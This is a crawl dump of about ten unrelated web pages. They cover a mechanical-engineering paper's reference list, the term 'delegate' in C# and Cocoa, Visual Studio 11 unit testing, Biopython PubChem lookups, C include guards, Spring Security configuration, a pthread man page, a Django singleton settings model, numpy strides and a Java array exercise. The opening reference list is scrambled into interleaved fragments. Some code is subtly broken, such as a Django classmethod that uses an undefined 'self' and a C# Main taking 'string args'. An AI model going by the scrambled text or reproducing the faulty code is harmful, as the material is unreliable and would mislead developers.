the students. Podhorodeski and W. The timing of the specific projects coincides with the material coverage in the course. Educ. 30th edn (CRC Press. A. of the 9th Applied Mechanism Conference (Kansas City. 1996). Accreditation Criteria and Procedures (Canadian Council of Professional Engineers. ‘Multiple-loop mechanism analysis using a microcomputer’. Introduction to Robotics – Mechanics and Control. pp. International Journal of Mechanical Engineering Education 32/2 . Podhorodeski. While the background remains the same. The experience familiarizes the students with the terminology of mechanisms. 1987). Mabie and C. 1997). MO. Motion Geometry of Mechanisms (Cambridge University Press. Dijksman. NJ. 1986). ON. [4] Canadian Engineering Accreditation Board (CEAB). Working Model 2D – User’s Manual (1996). L. 4th edn (John Wiley & Sons..114 R. E. 235–250. 2nd edn (Addison-Wesley. Mechanism Design – Analysis and Synthesis. Craig. University of Victoria. H. 2000). [6] Knowledge Revolution. [5] R. New York. New York. October 1985). 1995). CRC Standard Mathematical Tables and Formulae. Mechanics and Dynamics of Machinery. [7] E. 1976). V1–V7. with concepts related to mechanism synthesis. P. Shigley and J. Enging. Jr. and with techniques and computer programs for the design and analysis of mechanisms. the project functions very well within the first four weeks of a first course on the theory of mechanisms to strengthen student understanding of the taught material. Reinholtz. (3) (4) Design and analysis of cam and follower systems. 3rd edn (Prentice Hall. [9] J. References [1] A. 2nd edn (McGraw-Hill. P. S. Sandor. with relative motion analysis. Upper Saddle River. J. Mech. 16(4) (1988). ed. L. Acknowledgement The undergraduate students of the Department of Mechanical Engineering. P. F. are thanked for providing effective feedback on the QR mechanism project. Cleghorn and R. [3] H. Toronto. Zwillinger. Observation and calculation of gear reduction ratios. [2] J. the type of mechanism featured in the project varies from year to year. Int.. J.
https://pt.scribd.com/doc/37246468/s2-15
CC-MAIN-2017-09
en
refinedweb
In the programming world (particularly in the realm of C#), a delegate is an anonymous function pointer, which allows a function or method to be fully encapsulated and passed as an argument to other functions. The main benefit of using a delegate is that it allows for cleaner divisions of functionality among objects. Delegates have obvious applications in threading and event handling. For a more general explantion of how delegates apply to events, have a look at ariels' node on callbacks. public delegate void my_delegate(string message); This defines a new delegate type named "my_delegate" which points at a method with one string argument and which returns nothing (void). This type can then be instantiated using the standard new operator, giving the method for the delegate to point at as an argument. using System; class Foo { public void my_method(string message) { Console.WriteLine("my_method: " + message); } public delegate void my_delegate(string message); public static void Main(string args) { Foo my_obj = new Foo(); my_delegate foo = new my_delegate(my_obj.my_method); foo("hello"); } } Of course, delegates are pretty much obsolete in any language which has a lambda construct such as Lisp or Ruby. In OpenStep (and deriving technologies such as GNUStep and Cocoa), a delegate is an object that acts in behalf of another object. They're typically used to implement things that respond to various kinds of user or system signals. A typical example found in many programs is the application delegate. You can create a new class, for example, MyAppDelegate, and set it as the application's delegate with [NSApp setDelegate: [MyAppDelegate new]];. Now, you can implement methods to MyAppDelegate that respond to NSApplication's messages - for example, if you need to do something when the application starts up, you can implement the method - (void)applicationDidFinishLaunching: (NSNotification *)not; in the delegate class. Another typical example is the window delegate. Likewise by using NSWindow's setDelegate: method (or setting the delegate in the interface builder of your choice), you can implement a class that responds to window signals. For example, windowShouldClose: method would be called to determine whether or not the window can be closed. One sent by any constituency to act as its representative in a convention; as, a delegate to a convention for nominating officers, or for forming or altering a constitution. Court of delegates, formerly, the great court of appeal from the archbishops' courts and also from the court of admiralty. It is now abolished, and the privy council is the immediate court of appeal in such cases. [Eng.] © Webster 1913. Del"e*gate (?), a. [L. delegatus, p. p.] Sent to act for a represent another; deputed; as, a delegate judge. Strype. Del"e*gate (?), v. t. [imp. & p. p. Delegated (?); p. pr. & vb. n. Delegating (?).]. Log in or registerto write something here or to contact authors. Need help? [email protected]
http://everything2.com/title/delegate
CC-MAIN-2017-09
en
refinedweb
<T> is wanting to “await” on the result. This is particularly true when unit testing, because you probably need the result value to test against! In VS11 Beta, MS-Test now supports creating test methods that are marked async and that can therefore use the await keyword inside the method body. Here is an example: [TestMethod] public async Task MyAsyncTest() { var result = await SomeLongRunningOperation(); Assert.IsTrue( result ); } : #include "stdafx.h" #include ()); } }: [TestMethod] public void GetValue() { var stub = new StubIGenericMethod(); stub.GetValueOf1 = () => 5; IGenericMethod target = stub; Assert.AreEqual(5, target.GetValue()); }. What SKUs is Fakes available with? I noticed in the MSDN documentation for Shims it mentions the IntelliTrace profiler, suggesting it's only available with Ultimate. Martin @Martin Costello – The Fakes framework is available in the Premium and Ultimate VS11 SKUs. Saw your VS 11 ALM / Unit Testing session at the MVP Summit. Great work going on in this space. I've been playing with the UTE on a legacy project this week (1431 unit tests) and the performance is really good. However, usabilty wise, you have defintely identifed three of the key areas that still need work: grouping/sorting, hard to see test details and details select/copy to clipboard. The biggest one for us is the grouping/sorting. With our 1431 tests, many of which have the same test method names, it is really hard to find an interesting subset of tests to run/debug. At the very least, give us the ability to list tests by ClassName.TestMethodName. That would help a lot. Anyway, it really is awesome that you guys are investing so much in unit testing for VS 11. @Keith Hill – Yeah, we're working hard on these usability things so expect lots of improvements there over time. Thanks for the feedback, please keep it coming. Very useful, thanks You say that you are working hard on "these usability things" like grouping/sorting [which is great news], but I notice that Keith Hill's Connect issue on this [Bug 729524] has already been closed as Deferred. I think that is more than just a minor usability inconvenience for folks with non-trivial numbers of tests to manage, especially if launching single tests from the editor is also missing. Does ""working hard" on a "closed as deferred" issue mean "will be in the next release," I hope? Hi Peter, When I run code coverage on the assemblies it's instrumenting my test dll too. I've specified a testsetttings file which has only the "real" code assembly selected in the diagnostics section, set this from the Unit Test menu and specified this in my build process but it seems to be ignored by both TFS 11 and VS 11. Is there a reason for this? My thanks for getting MSTest playing nicely with F#, that was a very pleasant surprise Cheers @Dylan – Except for Dev10 back-compat scenarios, the .testsettings file is really for configuring your TeamBuild. Our Code Coverage runs over everything. Is that an issue? Can you help me understand why you wouldn't want to see code coverage on the test projects too (I know I do). Thanks! @Byron Jennings – If you look in my "We are working on it section" you will see that I did say we are actually working on this right now. We have to use "Deferred" as the Connect way of saying "We put this on our backlog and are working on it." If you look at Ian's comment in Keith's bug, you will see he says we are going to get this done very soon. Trust me, we want this as bad as you guys do. Can you confirm that Post Build Test Run is in Ultimate edition only as mentioned here Hi Peter, I guess I just never have run code coverage on unit tests. It seems a bit odd to me that you'd want to do that. Take a test that sets a flag to true if a particular method gets invoked (ignore just calling verify on Moq for brevity here). I want the test to assert that the flag is false. The code in the callback should never get hit in a passing test, which lowers the code coverage metric. And for people that are all jacked up about the numbers having a lowered code coverage could start a minor panic. I'll have a think about it and see, but I take your point that you probably do want to have code coverage on your tests, and I realize that you can see how much coverage a particular assembly has in the report. Just as an aside, is there a way to view the code coverage from builds in a report? Sorry if this is a dumb question, but for the 'Generate Unit Test Wizard', could the old version (or something like it) be made available as a NuGet package for those using MSTest? (Perhaps then with a name of 'Generate MSTest Unit Tests'?) If it could be made available as an open-source project, then even if the existing source is MSTest-specific, maybe others could make it work for other testing frameworks, or worst-case fork it and make modified versions for the other frameworks? One thing I really like about the nUnit test runner app is how it groups tests. It would be nice to have a similar view: presenting a grouping/hierarchy view where assembly is the top-level, followed by a level for each namespace element, then by class name, and finally by the test name itself. The tool also provides the ability to select any level of the hierarchy and run tests for all its children (or itself if it is a leaf node). Is Code Coverage Coloring suppose to work for native code in v11 Beta? In my software engineering role, I often create libraries that contain many internal mathematical routines which are behind the public face of the library. It is very important to have robust automated unit tests for these routines to ensure the integrity of the library. For reasons that are beyond the scope of this post, it is impractical to unit test solely at the public member layer and many of the internal routines have little or no meaning outside the context of the library in which they reside. Sometimes a private method is created to increase the maintainability and readability of an otherwise inscrutable computation. Consequently I found the ‘private accessor’ feature set quite effective in reducing the amount of custom scaffolding created to support testing and I am disappointed at its termination in the latest version of Visual Studio. I know that some have argued that unit tests should only be constructed for public members but I would suggest while that may be a good practice is most cases, it is a bad practice in some cases. Well, this post is already too long and I have some test scaffolding to write. In 2010 you could add a data source via a wizard in the properties window. Is this something that is going to be implemented? I can't believe you seriously took out the Generate Unit Tests functionality before you implemented an alternative… I use that almost daily in 2010.. What exactly is wrong with being coupled with MSTEST? Isn't it the MS Unit Testing Framework? I don't see you guys dropping the EF designer because it's tightly coupled to entity framework so you can figure out a way to both support it and nHibernate. This is a really useful and productive tool to leave out from the new edition, I can't believe you left it out and thought no-one would miss it!. Please put it back in, or give us something else as an alternative, just because its hard doesn't mean its not worth doing. Thanks. dissapointed that Right click Create Unit test options has been removed. I will not upgrade to Visual studio 2012 as a result. Jobin, Try reading this workaround and see what you think. Doh! Link:…/Regain-Access-to-the-CreateUnitTests-Command-in-VS2012.aspx I am truly appalled by the fact that the "Create unit test" menu item has been removed. " so it was cut. We are exploring alternatives here, but don’t have any good solutions yet."Just like that. Incomprehensible!!! There was a lot of comments about the missing Generate Unit Test functionality. The ALM Rangers team has been doing some excellent work in this space. And has released a beta VS add-in tool that replicates some of the functionality. We would love to hear more feedback. You can find it here,
https://blogs.msdn.microsoft.com/visualstudioalm/2012/03/08/whats-new-in-visual-studio-11-beta-unit-testing/
CC-MAIN-2017-09
en
refinedweb
Hi all, I have list of compound names for which i want to retrieve Pubchem CIDs..to acheive this i wrote a biopython script as follows but it doenst seem to working from Bio import Entrez Entrez.email = "[email protected]" infile = open("data", "r") out_put = open("ids_data.csv","w") for line in infile.readlines(): single_id = line #Post list of ids to database handle= Entrez.epost("pccompound",names=single_id) record = Entrez.read(handle) #history webEnv=record["WebEnv"] queryKey=record["QueryKey"] #Retreiving information data = Entrez.esummary(db="pccompound",webenv=webEnv,query_key=queryKey) res=Entrez.read(data) for compound in res: Name = compound["SynonymList"] Cid = compound["Id"] print "%s:%s" %(Name,Cid) out_put.write("%s:%s\n" %(Name,Cid)) out_put.close() Ideally i want a output as follows Biruvidine : 446727 Can any body help Thanks in advance Nit Can you fix the formatting? The example is very hard to read, and you didn't show the current output. It sounds like given an PubChem identifier like SID 74891762 you want to get back 'Brivudine: CID446727' - is that right? Can you fix the formatting? The example is very hard to read. And what do you mean by "it doenst seem to working"? What is the error message, if any? Thanks for fixing the formatting. Could you also include an example of the text in ids_data.csv so we have both sample input AND the desired output?
https://www.biostars.org/p/19016/
CC-MAIN-2017-09
en
refinedweb
Spring Security Java Config Preview: Readability In this post, I will discuss how to make your Spring Security Java configuration more readable. The post is intended to elaborate on a point from Spring Security Java Config Preview: Web Security where I stated: By formatting our Java configuration code it is much easier to read. It can be read similar to the XML namespace equivalent where “and()” represents optionally closing an XML element. Indentation The indentation of Spring Security’s Java configuration really impacts its readability. In general, indentation like a bullet list should be preferred. For a more concrete example, take a look at the following code: http // #1 .formLogin() // #2 .loginPage("/login") .failureUrl("/login?error") // #3 .and() // #4 .authorizeRequests() // #5 .antMatchers("/signup","/about").permitAll() .antMatchers("/admin/**").hasRole("ADMIN") .anyRequest().authenticated(); - #1 formLoginupdates the httpobject itself. The indentation of formLoginis incremented from that of http(much like they way the <form-login>is indented from <http>) - #2 loginPageand failureUrlupdate the formLoginconfiguration. For example, loginPagedetermines where Spring Security will redirect if log in is required. For this reason, each is a child of formLogin. - #3 andmeans we are done configuring the parent (in this case formLogin). This also implies that the next line will decrease indentation by one. When looking at the configuration you can read it as httpis configured with formLoginand authorizeRequests. If we had nothing else to configure, the andis not necessary. - #4 We decrease the indentation with authorizeRequestssince it is not related to form based log in. Instead, its intent is to restrict access to various URLs. - #5 each antMatchersand anyRequestmodifies the authorization requirements for authorizeRequests. This is why each is a child of authorizeRequests IDE Formatters The indentation may cause problems with code formatters. Many IDE’s will allow you to disable formatting for select blocks of code with comments. For example, in STS/Eclipse you can use the comments of @formatter:off and @formatter:on to turn off and on code formatting. An example is shown below: // @formatter:off http .formLogin() .loginPage("/login") .failureUrl("/login?error") .and() .authorizeRequests() .antMatchers("/signup","/about").permitAll() .antMatchers("/admin/**").hasRole("ADMIN") .anyRequest().authenticated(); // @formatter:on For this feature to work, make sure you have it enabled: - Navigate to Preferences -> Java -> Code Style -> Formatter - Click the Edit button - Select the Off/On Tags tab - Ensure Enable Off/On tags is selected - You can optionally change the strings used for disabling and enabling formatting here too. - Click OK Comparison to XML Namespace Our indentation also helps us relate the Java Configuration to the XML namespace configuration. This is not always true, but it does help. Let’s compare our configuration to the relevant XML configuration below. http .formLogin() .loginPage("/login") .failureUrl("/login?error") .and() .authorizeRequests() .antMatchers("/signup","/about").permitAll() .antMatchers("/admin/**").hasRole("ADMIN") .anyRequest().authenticated(); The relevant, but not equivalent, XML configuration can be seen below. Note that the differences between how Spring Security will behave between these configurations is due to the different default values between Java Configuration and XML configuration. <http use- <form-login <!-- similar to and() --> <intercept-url <intercept-url <intercept-url </http> - The first thing to notice is that the httpand <http>are quite similar. One difference is that Java Configuration uses authorizeRequeststo specify use-expressions="true" formLoginand <form-login>are quite similar. Each child of formLoginis an XML attribute of <form-login>. Based upon our explanation of indentation, the similarities are logical since XML attributes modify XML elements. - The and()under formLoginis very similar to ending an XML element. - Each child of authorizeRequestsis similar to each <intercept-urls>, except that Java Configuration specifies requires-channel differently which helps reduce configuration in many circumstances. Summary You should now know how to consistently indent your Spring Security Java Configuration. By doing so your code will be more readable and be easier to translate to and from the XML configuration equivalents.
http://spring.io/blog/2013/07/11/spring-security-java-config-preview-readability/
CC-MAIN-2017-09
en
refinedweb
Content-type: text/html pthread_mutexattr_destroy - Destroys the specified mutex attributes object. DECthreads POSIX 1003.1c Library (libpthread.so) #include <pthread.h> int pthread_mutexattr_destroy( pthread_mutexattr_t *attr); Interfaces documented on this reference page conform to industry standards as follows: IEEE Std 1003.1c-1995, POSIX System Application Program Interface Mutex attributes object to be destroyed. This routine destroys a mutex attributes object--that is, the object becomes uninitialized. Call this routine when your program no longer needs the specified mutex attributes object. After this routine is called, DECthreads may reclaim the storage used by the mutex attributes object. Mutexes that were created using this attributes object are not affected by the destruction of the mutex attributes object. The results of calling this routine are unpredictable, if the attributes object specified in the attr argument does not exist. If an error condition occurs, this routine returns an integer value indicating the type of error. Possible return values are as follows: Successful completion. The value specified by attr is invalid. None Functions: pthread_mutexattr_init(3) Manuals: Guide to DECthreads and Programmer's Guide delim off
http://backdrift.org/man/tru64/man3/pthread_mutexattr_destroy.3.html
CC-MAIN-2017-09
en
refinedweb
I have a file that contains integers organized into rows and separated by whitespace. Both the number and length of the rows are unknown. I'm currently iterating over the file line-by-line, and I'm trying to iterate over each line character-by-character but I'm having some trouble. I'm currently storing the contents of each line into a string, but I suspect that's not the best way, and I'm hoping someone can point me in the right direction. Here's my current code which simply prints each line in the file: std::string filename = "values.txt"; std::ifstream file(filename.c_str()); std::string line; while (std::getline(file, line)) { std::cout << line << std::endl; } for line in file: for char in line: print char You're almost there; you can use formatted stream extraction to read integers, using a string stream to represent each line: #include <fstream> #include <sstream> #include <string> // ... for (std::string line; std::getline(infile, line); ) { std::istringstream iss(line); for (int n; iss >> n; ) { std::cout << "Have number: " << n << "\n"; } std::cout << "End of line\n"; } Error checking can be added by checking whether the entire string stream has been consumed.
https://codedump.io/share/xirgep0LCbZJ/1/how-to-iterate-over-a-line-in-a-file
CC-MAIN-2017-09
en
refinedweb
By Louis F. (Intel), Added. They already include detailed instructions on how to get the source code, build, and run Embree with the example scenes. This series of blog articles will focus on the usage of Embree from a developer's perspective. I have been using Embree on Linux, but all information presented here should be relevant as well if you use other environments (Windows/Mac). Embree 2.0 was a dramatic change from version 1.0: it added support for Intel Xeon Phi and used Intel ISPC as the primary SIMD programming language for packet ray tracing. Embree 2.1 is also quite a bit of change from 2.0, it introduced a new kernel API that supports user extensions on primitive types, instancing, as well as more flexible ways to structure the scene. Since version 1.0, Embree has always bundled the kernels with an example path tracer. This also changed in version 2.1 where the kernels were released separately from the reference path tracing renderer. All of these are a lot of information to absorb, but I will try to cover them in the subsequent blogs. In the first couple of blogs I will discuss the reference implementation of the Embree renderer. The motivation is to allow someone unfamiliar to Embree can quickly exercise on various aspects of the renderer and the underlying kernels. After all, without a renderer, one can do little with just the kernels. Another important reason is that a highly optimized kernel requires a highly optimized renderer to reach its full potential. The Embree renderer is a good example of how to efficiently drive these kernels. The Embree Render Devices After you checkout the embree and embree-renderer source code from the github repository, follow the README.txt instructions in both projects to build them. Once they are built and properly set up so that the renderer can find the kernels libraries, you should be able to run this successfully: renderer -c ../models/cornell_box.ecs You should see a render window pop up, similar to this: The entry point to the renderer is in /devices/renderer/renderer.cpp This is an excellent place to learn how to drive the Embree renderer at a high level. Most code in Embree is under the namespace "embree". At the beginning of renderer.cpp, a list of global states and their default values are defined, followed by a number of functions which will parse the command line options to initialize these global states. It's best to look at the *.ecs files (which are plain text) in the context of the command line parsers in the renderer.cpp file. You will understand how the options were passed on to the renderer. One of the key concepts of the renderer API is the render Device interface. A derived class of Device implements the Embree renderer API, which is specified in /devices/device/device.h The benefit of having this API is that the renderer does not have to worry about where the computation is actually occurring (Xeon or Xeon Phi, local or remote). There are currently four devices implemented in the renderer: - COIDevice in /device/device_coi - ISPCDevice in /device/device_ispc - NetworkDevice in /device/device_network - SingleRayDevice in /device/device_singleray The ISPCDevice is a complete implementation of a path tracer with lights and materials. It's written in ispc which can be compiled to target Intel Xeon and Xeon Phi. It could also be set to use SSE, AVX, or Xeon Phi 512 bit SIMD instructions during compile time. The ISPCDevice utilizes the packet and hybrid ray tracing kernels, where SIMD is used to operate on multiple rays during traversal tests. In contrast, although the SingleRayDevice is also a complete implementation of the path tracer, it operates on single rays. The renderer features are very similar to the ISPCDevice. This renderer is mostly refactored from Embree 1.0. The NetworkDevice is a communication device that abstracts the actual compute device (a processor on a remote machine). It handles data transfer between local and remote machine through the network socket. A renderer_server binary is built from this device and should be run on the remote machine to listen to incoming render requests. Behind the scene, the NetworkDevice uses the other devices (ISPCDevice, SingleRayDevice) to do the actual rendering. The COIDevice is similar to the NetworkDevice in that it abstracts communication over the Xeon Phi Common Offload Infrastructure (COI) API. This device allows the renderer to pass data onto the Xeon Phi for rendering. Behind the scene, it spawns an ISPCDevice process on Xeon Phi. So this is a quick overview of Embree 2.1 and its renderer devices. In the next blog, we will look at some of them in more details and see what you can do with the renderer. Al N. said on "So this is a quick overview of Embree 2.1 and its renderer devices. In the next blog, we will look at some of them in more details and see what you can do with the renderer.". Unless I'm blind, I don't see a link to the "Next" blog! Add a CommentTop (For technical discussions visit our developer forums. For site or software product issues contact support.)Please sign in to add a comment. Not a member? Join today
https://software.intel.com/en-us/blogs/2014/01/24/introduction-to-embree-21-part-1?language=ru
CC-MAIN-2017-09
en
refinedweb
I am trying to run a python script using WebJob in Azure. But I am getting module is not found. When I tried to run the pip command it says Access denied Also I tried to change the folder permission using os.chmod [11/11/2016 18:17:35 > e1c140: ERR ] chmod: changing permissions of 'D:\Python27\Lib\site-packages/setuptools/....pyc': Permission denied [11/11/2016 18:17:38 > e1c140: INFO] error: could not create 'D:\Python27\Lib\site-packages\mpns': Access is denied --user def install(pack): pip.main(['install', "--user", pack]) (beautifulsoup, mechanize , python-mpns) python setup.py install So this is what worked for me (for Azure Functions but they are similar to WebJob and they even use the same SDK). I've copied wheel package of the module in question to the same github where the Function code was and added following code to the Function initialization: import os,pip,sys,time try: import pyodbc except: package = 'pyodbc-3.0.10-cp27-none-win32.whl' pip.main(['install', '--user', package]) raise ImportError('Restarting') You could obviously copy wheel package any other way, I just found this way convenient enough.
https://codedump.io/share/0OEwcWzBMs0k/1/install-python-modules-in-azure
CC-MAIN-2017-09
en
refinedweb
Well, apparently the registry seems to have lost some of its importance with the arrival of .NET, at least that's the impression I seem to get. But luckily for us, Microsoft has given us two nice classes for doing just about anything we want to do with the registry. The classes are Microsoft.Win32.RegistryKey and Microsoft.Win32.Registry. They have both been put into the Microsoft.Win32 namespace as you can see because the registry is totally Microsoft Win32 specific. Without too much fuss, let's get into business and try and do some of the stuff we normally do with the registry. Microsoft.Win32.RegistryKey Microsoft.Win32.Registry Microsoft.Win32 //The Registry class provides us with the // registry root keys RegistryKey rkey = Registry.LocalMachine; //Now let's open one of the sub keys RegistryKey rkey1=rkey.OpenSubKey( "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"); //Now using GetValue(...) we read in various values //from the opened key listBox1.Items.Add("RegisteredOwner :- " + rkey1.GetValue("RegisteredOwner")); listBox1.Items.Add("RegisteredOrganization :- " + rkey1.GetValue("RegisteredOrganization")); listBox1.Items.Add("ProductName :- " + rkey1.GetValue("ProductName")); listBox1.Items.Add("CSDVersion :- " + rkey1.GetValue("CSDVersion")); listBox1.Items.Add("SystemRoot :- " + rkey1.GetValue("SystemRoot")); rkey1.Close(); rkey = Registry.CurrentUser; //The second parameter tells it to open the key as writable rkey1 = rkey.OpenSubKey("Software",true); // Now we create our sub key [assuming you have enough // rights to edit this area of the registry] RegistryKey rkey2 = rkey1.CreateSubKey("Tweety"); //Setting the various values is done using SetValue() //I couldn't figure out how to set the value type yet :-( rkey2.SetValue("Name","Tweety"); rkey2.SetValue("Age",24); rkey2.Close(); rkey1.Close(); If you open regedit, you'll see that the new key has been added and the values have indeed been written correctly. Okay, we've read from and written into the registry. Now let's enumerate some values. rkey1 = rkey.OpenSubKey("Software\\Microsoft\\" + "Internet Account Manager\\Accounts\\00000001"); string[] s_arr = rkey1.GetValueNames(); foreach(String s in s_arr) { listBox1.Items.Add(s + " :- " + rkey1.GetValue(s)); } rkey1.Close(); Well, that's about it I guess. This was originally written as part of an internal tutorial. I didn't modify it too much except for taking better screenshots. Thanks..
https://www.codeproject.com/articles/2003/registry-handling-with-net?fid=3506&df=90&mpp=25&sort=position&spc=relaxed&select=137841&tid=137925
CC-MAIN-2017-09
en
refinedweb
:Hi. : :Why is the following test necessary before including headers? (for :example in sys/netgraph/netgraph.h). : :#ifndef _SYS_QUEUE_H_ :#include <sys/queue.h> :#endif : :when <sys/queue.h> already tests for inclusion? : :#ifndef _SYS_QUEUE_H_ :#define _SYS_QUEUE_H_ :... :#endif : :Thanks, :Nuno It isn't necessarily, it just prevents GCC from re-scanning header files that it has already processed. It just speeds up compilation a bit. GCC does have an option to do that sort of thing automatically but I really disagree with 'features' like that which break the C language and allow really sloppy programming. In anycase, for compilation performance one doesn't have to do it with every #include (for example, I almost never bother in .C files), but doing it in some of the more recursive header files greatly reduces the load on the preprocessor. -Matt Matthew Dillon <[email protected]>
https://www.dragonflybsd.org/mailarchive/kernel/2007-06/msg00054.html
CC-MAIN-2017-09
en
refinedweb
Practical application of Singleton design pattern in Django Today there is a huge number of software development methodologies - TDD,? The singleton pattern is a design pattern that restricts the instantiation of a class to one object. Let’s consider how this pattern can be used in django in practice. Settings for Web service, which will be stored in database and edited via admin panel, can be a practical example.='supprot SingletonModel admin.site.register(SingletonModel). To be able to use data from settings in the pattern, you can add an object of settings either in context of view or context processor. context_processors.py # -*- coding: utf-8 -*- from __future__ import unicode_literals from .models import SiteSettings def settings(request): return {'settings': SiteSettings.load()} Now let’s connect context process to settings.py: TEMPLATES = [ { ... 'OPTIONS': { ... 'context_processors': [ 'common.context_processors.settings', ... ], }, ] After this we can use templates in the following way: Support: {{ settings.support }} {% if settings.sales_depatment %} Sales Depatment: {{ settings.sales_depatment }} {% endif %} To reduce the amount of database requests you can save settings to cache. For this let’s add method set_cache to the model. def set_cache(self): cache.set(self.__class__.__name__, self) Let’s update save and load methods: def save(self, *args, **kwargs): self.pk = 1 super(SingletonModel, self).save(*args, **kwargs) self.set_cache() def load(cls): if cache.get(self.__class__.__name__) is None: obj, created = cls.objects.get_or_create(pk=1) if not created: obj.set_cache() return cache.get(self.__class__.__name__) As a result, we applied Singleton pattern for web application settings desing and storage, added settings to context processors, optimized settings as regards database requests using standard caching. We received the answers on how exactly to implement edited settings via admin panel and how to solve such problems. The final code is available on gist.github.
http://steelkiwi.com/blog/practical-application-singleton-design-pattern/
CC-MAIN-2017-09
en
refinedweb
For a numpy array X X[k[0], ..., k[d-1]] X[0,..., 0] k[0]*s[0] + ... + k[d-1]*s[d-1] (s[0],...,s[d-1]) X.strides X edit: It took me a bit to figure what you are asking about. With striding tricks it's possible to index the same element in a databuffer in different ways, and broadcasting actually does this under the covers. Normally we don't worry about it because it is either hidden or intentional. Recreating in the strided mapping and looking for duplicates may be the only way to test this. I'm not aware of any existing function that checks it. ================== I'm not quite sure what you concerned with. But let me illustrate how shape and strides work Define a 3x4 array: In [453]: X=np.arange(12).reshape(3,4) In [454]: X.shape Out[454]: (3, 4) In [455]: X.strides Out[455]: (16, 4) Index an item In [456]: X[1,2] Out[456]: 6 I can get it's index in a flattened version of the array (e.g. the original arange) with ravel_multi_index: In [457]: np.ravel_multi_index((1,2),X.shape) Out[457]: 6 I can also get this location using strides - keeping mind that strides are in bytes (here 4 bytes per item) In [458]: 1*16+2*4 Out[458]: 24 In [459]: (1*16+2*4)/4 Out[459]: 6.0 All these numbers are relative to the start of the data buffer. We can get the data buffer address from X.data or X.__array_interface__['data'], but usually don't need to. So this strides tells us that to go from entry to the next, step 4 bytes, and to go from one row to the next step 16. 6 is located at one row down, 2 over, or 24 bytes into the buffer. In the as_strided example of your link, strides=(1*2, 0) produces repeated indexing of specific values. With my X: In [460]: y=np.lib.stride_tricks.as_strided(X,strides=(16,0), shape=(3,4)) In [461]: y Out[461]: array([[0, 0, 0, 0], [4, 4, 4, 4], [8, 8, 8, 8]]) y is a 3x4 that repeatedly indexes the 1st column of X. Changing one item in y ends up changing one value in X but a whole row in y: In [462]: y[1,2]=10 In [463]: y Out[463]: array([[ 0, 0, 0, 0], [10, 10, 10, 10], [ 8, 8, 8, 8]]) In [464]: X Out[464]: array([[ 0, 1, 2, 3], [10, 5, 6, 7], [ 8, 9, 10, 11]]) as_strided can produce some weird effects if you aren't careful. OK, maybe I've figured out what's bothering you - can I identify a situation like this where two different indexing tuples end up pointing to the same location in the data buffer? Not that I'm aware of. That y strides contains a 0 is a pretty good indicator. as_stridedis often used to create overlapping windows: In [465]: y=np.lib.stride_tricks.as_strided(X,strides=(8,4), shape=(3,4)) In [466]: y Out[466]: array([[ 0, 1, 2, 3], [ 2, 3, 10, 5], [10, 5, 6, 7]]) In [467]: y[1,2]=20 In [469]: y Out[469]: array([[ 0, 1, 2, 3], [ 2, 3, 20, 5], [20, 5, 6, 7]]) Again changing 1 item in y ends up changing 2 values in y, but only 1 in X. Ordinary array creation and indexing does not have this duplicate indexing issue. Broadcasting may do something like, under the cover, where a (4,) array is changed to (1,4) and then to (3,4), effectively replicating rows. I think there's another stride_tricks function that does this explicitly. In [475]: x,y=np.lib.stride_tricks.broadcast_arrays(X,np.array([.1,.2,.3,.4])) In [476]: x Out[476]: array([[ 0, 1, 2, 3], [20, 5, 6, 7], [ 8, 9, 10, 11]]) In [477]: y Out[477]: array([[ 0.1, 0.2, 0.3, 0.4], [ 0.1, 0.2, 0.3, 0.4], [ 0.1, 0.2, 0.3, 0.4]]) In [478]: y.strides Out[478]: (0, 8) In any case, in normal array use we don't have to worry about this ambiguity. We get it only with intentional actions, not accidental ones. ============== How about this for a test: def dupstrides(x): uniq={sum(s*j for s,j in zip(x.strides,i)) for i in np.ndindex(x.shape)} print(uniq) print(len(uniq)) print(x.size) return len(uniq)<x.size In [508]: dupstrides(X) {0, 32, 4, 36, 8, 40, 12, 44, 16, 20, 24, 28} 12 12 Out[508]: False In [509]: dupstrides(y) {0, 4, 8, 12, 16, 20, 24, 28} 8 12 Out[509]: True
https://codedump.io/share/N83Nj06K1Q8j/1/checking-non-ambiguity-of-strides-in-numpy-array
CC-MAIN-2017-09
en
refinedweb
Project Write a program that will prompt the user for a list of 5 prices. Once the user has entered all values, your program should compute and display the following: • The sum of all the prices • The average of the prices • All prices that are higher than the calculated average To better solve this problem, break your code out into the following methods: • sumArray – this method should receive an array and return the sum of all elements in the array. NOTE: this method produces no output. • aveArray – this method should receive an array and return the average of all elements in the array. NOTE: this method produces no output. •). Here is my coding so far. I can not find the coding for finding the prices that are higher than the calculated average. import javax.swing.*; public class ArrayProgram { public static void main(String[] args) { String[] items = {"Apples", "Bananas", "Nectarines", "Oranges", "Plums"}; double s; double a; double[] price = new double[5]; for (int i = 0; i < items.length; i++) { price[i] = Double.parseDouble(JOptionPane.showInputDialog(("Enter Price for " + items[i]))); s = sumArray(price); a = aveArray(price); higherAve(price, a); JOptionPane.showMessageDialog(null, "The total cost of these items is: $" + s); JOptionPane.showMessageDialog(null, "The average cost of these items is: $" + a); JOptionPane.showMessageDialog(null, "The prices above average are: "); } } public static double sumArray(double[] array) { double sum = 0.00; for(int s = 0; s < array.length; s++) sum += array[s]; return sum; } //This function takes in an array of values and returns the average of all the values in the array public static double aveArray(double[] array) { //First get the sum of the values in the array double sum = sumArray(array); //Then divide the sum by the number of elements in the array to arrive at the average double a = sum / (double)array.length; return a; } //This function is used to find the prices higher than the average price public static void higherAve(double[] price, double a) { } } This post has been edited by Dogstopper: 26 April 2010 - 07:15 AM Reason for edit:: Added code tags for the newbie
http://www.dreamincode.net/forums/topic/170333-java-array-help/
CC-MAIN-2017-09
en
refinedweb
